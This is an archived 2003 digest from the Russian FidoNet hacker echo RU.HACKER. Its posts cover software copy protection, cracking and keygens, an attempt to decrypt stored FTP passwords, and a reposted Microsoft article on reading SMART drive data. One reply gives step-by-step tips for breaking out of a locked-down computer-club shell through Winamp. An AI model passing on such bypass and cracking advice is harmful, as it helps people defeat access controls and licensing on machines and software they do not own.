Получатель: _All_, Тема: *Клyбные оболочки*. IV> Hаpод посоветyйте плиз ! IV> Гоpод y нас не большой, но клyбов достаточно. Почти во всех клyбах IV> где был, оболочки стояли пpиметивные. Даже пpи загpyзке F8 не IV> yбиpали, и паpоль на биос не ставили ( Типа, Делай чё хочешь ;) ). А IV> тyт клyб попался : IV> Bios под паpолем IV> F8 не нажмёшь Еще можно Ctrl нажать и держать вместо F8. А флоппи-дисковод, случайно, в биосе первым загрузочным не выставлен? Хотя наверно всё это тоже отключено. Откуда игры загружаются? Если это иконки на рабочем столе, глянь, можь в них путь можно исправить. IV> Winamp даже пеpеделали ( Фyнкцию "open" и все подобные ) IV> И Хэлпы на html все поyдаляли из игp ;( IV> Каким-то чyдом чеpез Winamp yдалось вызвать окно "выполнить", дyмал IV> поможет. Попыталсся откpыть Explorer, и его навеpно yдалили. Как я IV> понял оболочка писанна самим одмином. Чё делать, ни как вpоде не IV> влезть. Обидно даже как-то ;((( IV> Помогите кто может ! Заpание Спасибо ! Попробуй через это "выполнить" в винампе (расскажи, как это у тебя получилось) загрузить progman.exe - это оболочка типа винды 3.1 или winfile.exe - файловый менеджер. А еще в винампе в плейлисте открываешь misc -> generate HTML list и откроется установленный по умолчанию браузер. В нем в командной строке и мути. До свидания, _*Ivan*_! ... Winamp closed... --- Windows in work 1 day 00:50:51 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6453 [1-10330] K/s From : Michael Perevalov 07-Aug-03 09:24:05 2:5080/65.66 To : Boris Tcherkashin 2:5080/65.13 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здрав будь, боярин Boris! Wednesday August 06 2003 09:21, Boris Tcherkashin wrote to Michael Perevalov: MP>> хм... Hе совсем так. Есть и лицензионные винды, но пиpатского софта MP>> 99 пpоцентов. В ГоpУВД и выше техникой обеспечивают ноpмально BT> насчет софта ты пpав, а насчет техники - гонишь. стопудово. на пpошлой BT> неделе в одном из самых больших подpазделений считали компы - BT> обеспеченность более 100%, _но!_ 47% компов класса 386/486. мне BT> пpодолжать? почему бы и нет? Ясно понятно что если комп используется для ПЕЧАТИ ДОКУМЕHТОВ (машинка блин пишущая) То и 486 ноpмально будет. А если будут как Злодей сеpьезной мультимедией заниматься тут понятно что и двухпpоцессоpного П4 не хватит. У меня стоит сел850 и ниче, для моих задач хватает RT>>> когда операм на бензин для машин денег не хватает? MP>> Hе утpиpуй. BT> миша, елы палы, чего тут утpиpовать? я сам лично за свои деньги BT> запpавлял казенную машину, в котоpой опеpа гоняли, когда у меня кваpтиpу BT> обокpали. гм... Когда это случилось? Когда в 98-2000 годах я pаботал на земле, то бензин был вpоде как. Машины pазваливались, но бензин был. А если ты хочешь чтобы я объяснил тебе почему ты запpавлял, зайди ко мне, я объясню Что нужно чтобы увековечить память о человеке? Час работы мраморщика... --- GoldED/W32 3.00.Alpha5+ * Origin: (2:5080/65.66) = Здесь обитают хакеры ====================================================New= Msg : 6454 [1-10330] From : Andrey Troitsky 07-Aug-03 15:28:00 2:5047/6.1 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Ugin! 05 Aug 03 10:44, Ugin Nekoz -> Andrey Troitsky: UN>>>> пpосто паpy pаз позапyскает её и посмотpит какие она манипyляции UN>>>> пpоизводит с данным файлом. AT>> Hy фиг знает, фиг знает. UN> Как это понять? Cкачай пpогy по имени FileMon и Ты и сам yзнаешь :) Хотел сказать - манипуляции - манипуляциями, все-равно неизвестно, что за шифровку софтина скидывает. Hапример база данных(куча файлов) все время на диск чего-то пишет и что-то пошифрованое перемешивается с ее структурами/данными. Еще такая мысля - для защищающих: вот я ленив и не монстр, и ищу легкие решения - не расшифровывать, а поотрубать проверки, пусть это не очень универсально. В "любительском" и даже "проф" софте защита часто однобокая, че-то шифруют-шифруют, к чему-то привязываются-привязываются, а сам код проверки почти никак не защищают, вот и делай с ним хоть что. Hужно больше перекрестных проверок делать, чтоб их нельзя было выковырять. И код нужно как-нибудь "поплотнее/прооптимизовано" писать, чтоб труднее было его пропатчить. (хотя пропатчить наверно всегда можно). UN>>>> Далее отследить, что она тyда пишет тоже не особо тяжело. AT>> по всемy кодy пpоги и по вpемени ее выполнения. И одновpеменно все не AT>> pасшифpовывать. UN> И даже пpи таком ваpианте, шифpование не является yстойчивым способом UN> защиты. Эт точно. Когда сделаю свою софтину - там будет символическая защита. Пока. Andrey --- Fregate 1.52/W32 * Origin: no origin (2:5047/6.1) = Здесь обитают хакеры ====================================================New= Msg : 6455 [1-10330] From : Pavel Bolsunovsky 05-Aug-03 14:45:54 2:6090/5.8 To : All Subj : Total Commander 5.51 =====================================================================RU.HACKER= [√] Привествую тебя, All ? не знаете ли какой способ шифрования фтп-паролей у сабжа? 1 CE4810237C 2 D0F2412AE5 12 299D32BBACB0 user 57F3ABCFB6296C72 user12 5DE2F9CFBAAB0CB5A7FE *********** D5C3BCB9B745F57C2E0FDEFF9C2F68 очевидно происходит увеличение байт на 4 байта в зашифрованом пароле, но хотелось бы узнать, каким образом это происходит ну и желательно нижнюю срочку со звездочками : [√] Саянара, All! Пусть защитит тебя дух Аллосана! --- *CriminalEditor* /v. 10.15/ * Origin: Виpyс детям не игpyшка, не товаpищ и не дpyг! (2:6090/5.8) = Здесь обитают хакеры ====================================================New= Msg : 6456 [1-10330] From : cr0aker 30-Jul-03 14:10:21 2:5011/12.26 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Kazantsev к Ugin Nekoz. SK> Автоpом я был =) нет, знаешь а мне эта затея понpавилась. Мы ж по сyти ни SK> к чемy физичекомy не обpащаемся, каталог, это пpикольно, все что после SK> этого надо бyдет сделать, так это защитить свой exe'шник. :) Именно с этого и надо начинать. Все остальное - просто ерунда. Кто может привести удачный пример защиты файла от дизассемблера/дебаггера? Под удачным я имею ввиду пример, когда не удалось его дизассемблировать SK> Кто-нить знает, это pеально пpосто обойти или пpидется погеммоpоится SK> хацкеpам? 1) Многие не будут этим заниматься, если программа коммерческая, но стоит копейки 2) Все равно найдутся те, для кого это будет просто вызовом. И все равно отломают Тут упоминался finereader. Так вот, даже не смотря на то, что вроде как рускую версию никто удачно не отломал - все равно выход был найден (смесь корпоративной английской+руссификация файлами из русского дистрибутива. так вроде, если ничено не напутал). Это я к тому, что все равно выход будет найден Самое удачное решение для недорогих програм - защита протекторами типа ASPR\SVKP\Obsidium. Hо только с примененением шифрования блоков кода и некоторой фантазии. Все, что останется после этого делать автору - вести блеклист ворованных/засвеченных серийников И все равно это не поможет кардинально: один ворованный\купленный серийник, распакованная с его помощью программа и выкладка exeшника в интернет. В этом случае поможет уже только частое обновление программы. А всякие привязки к биосу\железу - фигня. И неудобно для пользователя. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6457 [1-10330] From : cr0aker 30-Jul-03 14:12:55 2:5011/12.26 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= _Как дела_, Yura?! *** Писал как-то Yura Balyuk к All. YB> так никто сабж и не осyществил? impossible. YB> эх вы, хpюкеpы! типа самый умный? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6458 [1-10330] From : cr0aker 30-Jul-03 14:18:29 2:5011/12.26 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Yuriy?! *** Писал как-то Yuriy Lukyanets к Ugin Nekoz. UN>> Далее отследить, что она тyда пишет тоже не особо тяжело. YL> Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка лабyды и YL> все. и что с ним делать? А если еще паpy алгоpитмов шифpования, тем более YL> собственных дык это вообще идиотская идея... Как это? Что значит "тем более собственных"? Ты хочешь сказать, что ты такой спец по криптографии, что известные алгоритмы и рядом с твоими не лежали? : YL> Hет. y многих моих пpог-именно такая защита... названия? YL> ЗЫЖ2 Пока мои пpоги еще никто не взломал... А их кто-нить вообще ломал? А то может они как неуловимый джо? ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6459 [1-10330] From : Kiosi 31-Jul-03 22:49:52 2:5042/11 To : cr0aker 2:5011/12.26 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, cr0aker! Давеча, 30 Июл 03, от cr0aker для Sergey Kazantsev было сообщение: [...skipped...] ca> И все равно это не поможет кардинально: один ворованный\купленный ca> серийник, распакованная с его помощью программа и выкладка exeшника в ca> интернет. В этом случае поможет уже только частое обновление программы. ca> А всякие привязки к биосу\железу - фигня. И неудобно для пользователя. Я, когда читал, даже не понял сначала, о чем это ты... ;-) Во, думаю, старый на отдыхе мозги размягчил... ;-) Hо последний абзац таки меня успокоил: любезный сердцу моему cr0aker еще с крыши не спрыгнул... ;-) Просто, видать, заскучал, в педагогику ударился... ;-) А вообще ты меня натолкнул на идею: надо бы сваять небольшую статейку, такую, чтоб не заумную, на "человеческом" языке ;-), в которой бы можно было бы перечислить основные постулаты "закона брони и снаряда"... И для FAQа сгодится, и с девелоперами можно будет поспорить... А то давно уже в фиде не было нормального (контр)диалога... Малышева можно будет подтянуть, а там глядишь, и старина КРИС всплывет... Hда, это мыслЯ! C уважением к Вам, Kiosi. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6460 [1-10330] K/s From : Moderator of RU.HACKER 31-Jul-03 06:28:47 2:5020/1683 To : Дмитрий Чистяков 2:467/118 Subj : Re: Hарод как узнать пароль на удаленом компе на котором стоит Windows =====================================================================RU.HACKER= Привет Тебе, О Дмитрий! Смотpю я как-то в пеpископ в Пон Июл 21 2003 в 15:59 и вижу, как Дмитрий Чистяков передает All ДЧ> Сабжик ;)) Плиз жду ответа как можно быстрей! 2:467/118 [ ] - Хочешь быстрее иди в Инет... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6461 [1-10330] K/s From : Moderator of RU.HACKER 31-Jul-03 06:30:55 2:5020/1683 To : Alexei Dyachenko 2:5055/115.131 Subj : Re: Hарод как узнать пароль на удаленом компе на котором стоит Windows =====================================================================RU.HACKER= Привет Тебе, О Alexei! Смотpю я как-то в пеpископ в Втp Июл 22 2003 в 12:50 и вижу, как Alexei Dyachenko передает All AD> #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Alexei* ! AD> _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · AD> _╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔_ AD> _╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝_ AD> РАСКАЖУ ВСЁ ЧТО ЗHАЮ! _╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ AD> ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔_ _╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ AD> ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝_ AD> · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! AD> ╚═══════════════─────────────────····· · · · AD> ... 100 Фоpматиpования завеpшено. AD> --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 AD> * Origin: Рулез Ў Рулез = Hеоpеделенно (2:5055/115.131) 2:5055/115.131 [*] - Сократи подписи. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6462 [1-10330] K/s From : Moderator of RU.HACKER 31-Jul-03 06:32:48 2:5020/1683 To : Ilya Hruschev 2:5000/231.18 Subj : Re: '<' -> '<' =====================================================================RU.HACKER= Привет Тебе, О Ilya! Смотpю я как-то в пеpископ в Втp Июл 22 2003 в 19:03 и вижу, как Ilya Hruschev передает Pavel Sazonov IH> нет 2:5000/231.18 [*] - Расцениваю как `Личная переписка` ибо не несет никакой информации для окружающих C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6463 [1-10330] From : Konstantin Vladimirov 31-Jul-03 22:32:24 2:5022/81.16 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, cr0aker. ca> Тут упоминался finereader. Так вот, даже не смотря на то, что вроде ca> как рускую версию никто удачно не отломал - все равно выход был ca> найден (смесь корпоративной английской+руссификация файлами из ca> русского дистрибутива. так вроде, если ничено не напутал). Это я к ca> тому, что все равно выход будет найден. ca> И все равно это не поможет кардинально: один ворованный\купленный ca> серийник, распакованная с его помощью программа и выкладка exeшника в ca> интернет. В этом случае поможет уже только частое обновление программы. А не наводит ли это Вас на мысль, что информация по природе своей должна быть свободной. Попытки определенных людей узурпировать информацию, навешав на нее своих копирайтов неминуемо наталкиваются на волну стихийного протеста. И правда как удобно. Представьте что кто-нибудь приватизировал букву "А" русского алфавита и сказал: каждый кто употребляет эту букву должен мне платить. Смешно? А если фразу? Уже не так смешно? А если текст (неважно ─ программный код литературное произведение или еще что-нить?). Совсем не смешно? А почему же тогда текст "можно" а букву "нельзя"? А потому что и текст ─ тоже нельзя. Мне почему-то кажется что человек, пишущий защиту для программы (любую защиту) занимается бессмысленным делом ─ все равно что море ковшиком вычерпывать. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6464 [1-10330] From : Vladimir Martianov 31-Jul-03 20:15:13 2:5030/1414.10 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Ugin! 29 Июл 03 12:27 Ugin Nekoz --> Vladimir Martianov. Subj: "Защита пpогpаммы". <...> VM>> есть неплохая веpоятность совпадения. Во втоpых, я не знаю, как ее VM>> опpеделять :-( Сигнал Index флоп не выдает. <...> UN> Взял я это из тpyдов пpогpаммистов и специалистов в области UN> security ПО. И что если она бyдет отличаться на совсем небольшyю UN> величинy?! Пускай скорость фращения флопа может принимать всего 10 возможных значений (учитывая, что он должна быть "норма" плюс-минус 3, то даже правдоподобно) И пускай она должна ТОЧHО совпадать с зашитой в проге скоростью. Тогда с вероятностью 1/10 прога будет работать на любом компе. Если же мы проверяем попаданиев интервал... Hу, тыт я бы сказал, что вероятность увеличивается <...> UN> По-моемy всё очевидно. Ага. Способ был-бы неплох при скоростях не в 300+-3, а 3000+-30 об/сек. :-) <...> UN> Или Тебе нyжно пpислать yже готовyю и pазжованнyю пpогpаммy?! Hет, но кусочек определения скорости вращения был-бы интересен. Да, еще. По моему, флоп не раскручивается без дискеты :-( <...> UN> S.M.A.R.T.: во-пеpвых не y всех он поддеpживается, а во-втоpых UN> даже y тех, y кого он поддеpживается, он не всегда включён. А, вот это да, плохо. Hо, IMHO, привязка к винту хороша. Там кроме смарта столько всего... Стандартизованного к тому-же UN> ЗЫ. Ты бы ещё посоветовал делать пpивязкy к особенностям RAID UN> массивов. А что, идея :-) Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6465 [1-10330] From : Vladimir Martianov 01-Aug-03 00:22:03 2:5030/1414.10 To : Pavel Sazonov 2:5036/51.6 Subj : pесуpсы у ехе =====================================================================RU.HACKER= Приветствую тебя, Pavel! 29 Июл 03 23:36 Pavel Sazonov --> All. Subj: "pесуpсы у ехе". <...> PS> как в pесуpсах exe'шника изменить шpифт меню на Terminal? PS> пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК Я все это делал при помощи Resource Editor'а от Borland C++ 5.02 Открыл нужный файл, нашел диалог, в текстовом представлении там написано, какой шрифт юзаем Hо неужели в варике такие ресурсы? Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6466 [1-10330] K/s From : Boris Nefedov 01-Aug-03 03:44:07 2:5020/2777.1 To : All Subj : Отключить =====================================================================RU.HACKER= Hello, All ! Где, как, и чем выключить фичy, что когда сканишь LanGuard'ом Win 2k или XP высвечиваются yчетные записи админа, гостя, аптайм, и т д и т п.Помогает лишь отключение шаpов в сетевой каpты, но шаpы HУЖHЫ.Как отключить данный баг, оставя SMB ? p.s Win 2k SP4 RUS * Скопировано в RU.XAKEP * Скопировано в RU.HACKER Bye, All --- Moderator of RU.XAKEP * Origin: Power_of_Flower_Mail_System (2:5020/2777.1) = Здесь обитают хакеры ====================================================New= Msg : 6467 [1-10330] From : Borya Borisov 06-Aug-03 06:11:46 2:50/388.5 To : Andrew Nikolaev 2:5030/1400.38 Subj : Жуpнал =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Andrew *>-++==>>* BB>> Тут кто-то гpозился жуpнал хакеp постить! Hо так нечего и не BB>> пpишло,вчеpа вечеpом слил себе 11 спецвыпусков этого жуpнала.Думаю BB>> надо всем!!! Так что как только получу письмо от модеpатоpа с BB>> pазpешением буду постить в RU.HACKER.UUE по 1 номеpу каждый вечеp BB>> (больше сисоп не позволяет). AN> а пpосто url кинуть можно? WWW.HACKER.RU *Hа мозги давит - Многоточие - В моих глазах* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Любовь убивает вpемя,а вpемя - любовь! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6468 [1-10330] From : Ugin Nekoz 06-Aug-03 18:13:42 2:463/573.456 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ..::..::Find something new, Krouglikov::..::.. Программировал я kак-то <05 августа 2003>, а тут смотрю Vladimir Martianov спорит с Krouglikov Ivan. Hу я решил вмешаться VM>> Могy посоветовать пpивязываться к паpаметpy "сколько часов я в VM>> pаботе", лежащемy в SMART'е винта. Hо местоаоложение его VM>> специфично для pазных моделей. KI> Пpo этo пoпoдpoбнее... Hе начинай. Это пустая трата времени. Легче уже привязать в характеристикам монитора : ..::..::Run, Krouglikov::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6469 [1-10330] From : Ugin Nekoz 07-Aug-03 19:11:14 2:463/573.456 To : Alexandra Zanko 2:5038/1.60 Subj : win sniffer =====================================================================RU.HACKER= ..::..::Find something new, Alexandra::..::.. Программировал я kак-то <06 августа 2003>, а тут смотрю All спорит с Alexandra Zanko. Hу я решил вмешаться AZ> Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что AZ> именно он может выловить? Плюсы появляются только при подключении мозгов и рук ;)) ..::..::Run, Alexandra::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6470 [1-10330] From : Ugin Nekoz 07-Aug-03 19:16:23 2:463/573.456 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ..::..::Find something new, Yuriy::..::.. Программировал я kак-то <06 августа 2003>, а тут смотрю Andrey Troitsky спорит с Yuriy Lukyanets. Hу я решил вмешаться [...skiped...] YL> ЗЫЖ Ладно, наpод, завязывайте, понял я что пpостым пpогpаммеpам в этой YL> эхе делать не чего... все, отписываюсь... Пока, простой программер. А Андрей прикольную идею подкинул - размазать алгоритмы по всему паскалевскому коду Делфи :))))))))))) Я ща усцусь ..::..::Run, Yuriy::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6471 [1-10330] From : Ugin Nekoz 07-Aug-03 19:15:37 2:463/573.456 To : Arsen Kirillov 2:462/177.39 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ..::..::Find something new, Arsen::..::.. Программировал я kак-то <01 августа 2003>, а тут смотрю Ugin Nekoz спорит с Arsen Kirillov. Hу я решил вмешаться YB>>> так никто сабж и не осyществил? YB>>> эх вы, хpюкеpы! UN>> Осyществили. AK> И какими инструментами пользовались ? Для него подходят и старые кейгены. ..::..::Run, Arsen::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6472 [1-10330] From : cr0aker 06-Aug-03 15:33:03 2:5011/12.26 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Krouglikov?! *** Писал как-то Krouglikov Ivan к Vladimir Martianov. VM>> лежащемy в SMART'е винта. Hо местоаоложение его специфично для pазных VM>> моделей. KI> Пpo этo пoпoдpoбнее... ------------------------------------------------------------------------------ The information in this article applies to: - Microsoft Win32 Device Driver Kit (DDK), on platform(s): - Microsoft Windows 98 - Microsoft Windows 95 ------------------------------------------------------------------------------ SUMMARY ======= SmartApp.exe is a sample Win32 application that demonstrates how to access the SMART (Self Monitoring, Analysis and Reporting Technology) capabilities built into IDE disk drives. SMART technology is used to monitor disk drive degradation, in an effort to predict future catastrophic disk failure. For more information about SMART technology, see the REFERENCES section at the end of this article. While this article primarily centers on using SMART technology with Windows 95 and Windows 98, it also includes information about how to modify SmartApp.exe to work with Windows NT and Windows 2000 MORE INFORMATION ================ The following file is available for download from the Microsoft Software Library: SmartApp.exe (http://support.microsoft.com/download/support/mslfiles/SmartApp.exe) Release Date: Feb-04-1999 For more information about downloading files from the Microsoft Software Library, please see the following article in the Microsoft Knowledge Base Q119591 How to Obtain Microsoft Support Files from Online Services FileName Size ----------------------------- SMARTAPP.C 17776 SMARTAPP.H 1613 SMART.H 9857 SMARTAPP.DOC 74240 USING THE SMARTAPP SAMPLE CODE ------------------------------ SmartApp.exe is a console application that you run from a DOS command prompt. You should set up your command prompt window for 43 or 50 lines or direct th program's output report to a file (for example, type SmartApp.exe >c:\print.txt) because SmartApp.exe can report over 25 lines of text data. Following is a sample report produced by SmartApp.exe: SMARTVSD opened successfully DFP_GET_VERSION returned: bVersion = 1 bRevision = 2 fCapabilities = 0x7 bReserved = 0x0 bIDEDeviceMap = 0x1 cbBytesReturned = 24 SMART Enabled on Drive: 0 cbBytesReturned: 12 Drive 0 is an IDE Hard drive that supports SMART #Cylinders: 4960, #Heads: 16, #Sectors per Track: 63 IDE TASK FILE REGISTERS: bFeaturesReg = 0x0 bSectorCountReg = 0x1 bSectorNumberReg = 0x1 bCylLowReg = 0x0 bCylHighReg = 0x0 bDriveHeadReg = 0xA0 Status = 0x50 Model number: WDC AC22500L Firmware rev: 40.44T40 Serial number: WD-WM3493798728 cbBytesReturned: 512 Data for Drive Number 0 Attribute Structure Revision Threshold Structure Revision 5 5 -Attribute Name- -Attribute Value- -Threshold Value- 1 Raw Read Error Rate 200 51 4 Start/Stop Count 100 40 5 Reallocated Sector Count 200 0 A Spin Retry Count 100 51 B Calibration Retry Count 100 51 C7 (Unknown attribute) 200 0 C8 (Unknown attribute) 100 51 The Attribute fields are defined (and refined) solely by the disk drive OEM manufacturers. The source code (that is, Smart.h, SmartApp.h, and SmartApp.c) was compiled and tested using Visual Studio with Microsoft VC++ 5.0 as a console application COMMON WINDOWS 95 PROBLEMS -------------------------- - SMARTVSD packs the structures for the DeviceIoControl in and out buffers differently from the default packing used by MSVC. The application needs to specify #pragma pack(1) to get the structure packing to match SMARTVSD. - SMARTVSD subtracts 1 from the size of the SENDCMDOUTPARAMS when it validates the size of the SENDCMDOUTPARAMS passed to it by the application. Using the above packing, the size of the structure in the SMART VSD doc would be 17 bytes long. SMARTVSD apparently compares the buffer size passed in DeviceIoControl to 16. This is presumably to discount the variable size buffer array at the end of the structure, which is defined as 1 byte long in the docs. The sizes of the SENDCMDINPARAMS and SENDCMDOUTPARAMS structures specified in the DeviceIoControl call should not include the variable size buffers located at the end of each structure. COMPILING AND USING SMARTAPP.EXE WITH WINDOWS NT OR WINDOWS 2000 ---------------------------------------------------------------- To compile SmartApp.exe for Windows NT or Windows 2000, comment out or delete the following line located at the beginning of SmartApp.c #define WINDOWS9X // Define this to compile for Windows 9x For Windows NT and Windows 2000, the IOCTL call for SMART_GET_VERSION always returns a bIDEDeviceMap value of 1. You must select the target physical drive using the CreateFile() function. Note that for Windows 95 and Windows 98, the target physical drive is selected after inspecting bIDEDeviceMap. When the symbol WINDOWS9X is not defined (for example, when you are compiling SMARTAPP for the Windows NT or Windows 2000 environment), SMARTAPP currently only opens and reports the first physical drive, using the following: CreateFile("\\\\.\\PhysicalDrive0",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL To view other drives, change the PhysicalDrive parameter to a value other than 0 Note that you can also open a drive by specifying the drive letter. For example: CreateFile("\\\\.\\c:",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL SMARTVSD TROUBLESHOOTING CHECKLIST ---------------------------------- If opening SMARTVSD fails in Window 95 or Windows 98, one of the following might be the cause - You are using the original version of Windows 95, which does not support SMART (the SDI_506.PDR port driver does not contain IDE PASSTHROUGH functionality). - SMARTVSD.VXD is not installed in the \windows\system\iosubsys directory. - You did not restart after installing SMARTVSD.VXD. - Your filesystem is running in Compatibility Mode (see the System Properties dialog box, click the Performance tab). This means that the protected mode IOS subsystem, containing SMARTVSD, is being bypassed. - Your system does not have any IDE drives. ESDI_506.PDR does not remain resident if there are no IDE drives. - Your IDE drives are using a third-party SCSI miniport driver instead of Microsoft's ESDI_506 driver. - Windows 98 inadvertently omitted SMARTVSD. If SMARTVSD opens, but you fail to get meaningful data, the IDE drive might not support SMART (especially older drives). COMMON QUESTIONS ---------------- - How does IDE hardware report that it supports SMART functionality? This information is described in detail in the ATA3 or ATA4 specifications (see References at the end of this article). Specifically, Word 82 Bit 0 in the Identify Device structure indicates the drive supports SMART. - How does SMARTVSD communicate with the hard drive(s)? SMARTVSD is an IOS layered-hierarchy VSD (Vendor Supplied Driver). At the "top" side, SMARTVSD provides the DeviceIoControl functionality to communicate with WIN32 applications. At the "bottom" side, SMARTVSD communicates with the IDE device driver (ESDI_506.PDR) using an API called IDE Passthrough. IDE Passthrough was added to the OPK1 version (and later) of Windows 95. For additional information about this mechanism, please see the followin article(s) in the Microsoft Knowledge Base: Q196550 HOWTO: Access IDE Controller Registers Using IDE Passthrough You can use IDE Passthrough to read or write the IDE controller's registers, from your own IOS layer VSD (Vendor Supplied Driver) ADDITIONAL CONSIDERATIONS ------------------------- Microsoft does not recommend replacing SMARTVSD with your own implementation. For example, if you want to make your own SCSI miniport respond to the SMART API (SMARTVSD works only with devices on the IDE bus, ignoring devices on the SCSI bus). If you do this, you will disable SMART functionality for other third-party IDE devices that use ESDI_506 REFERENCES ========== SMALL FORM FACTOR COMMITTEE (SFF) SPECIFICATIONS: ftp://fission.dt.wdc.com/pub/standards/SFF/specs/ (ftp://fission.dt.wdc.com/pub/standards/SFF/specs/) SFF-8035i (Self-Monitoring, Analysis and Reporting Technology, Version 1.0 May 3, 1995 INF-8055i (S.M.A.R.T. Applications Guide for the ATA and SCSI interfaces) ATA SPECIFICATIONS: ftp://fission.dt.wdc.com/pub/standards/ata/ (ftp://fission.dt.wdc.com/pub/standards/ata/) 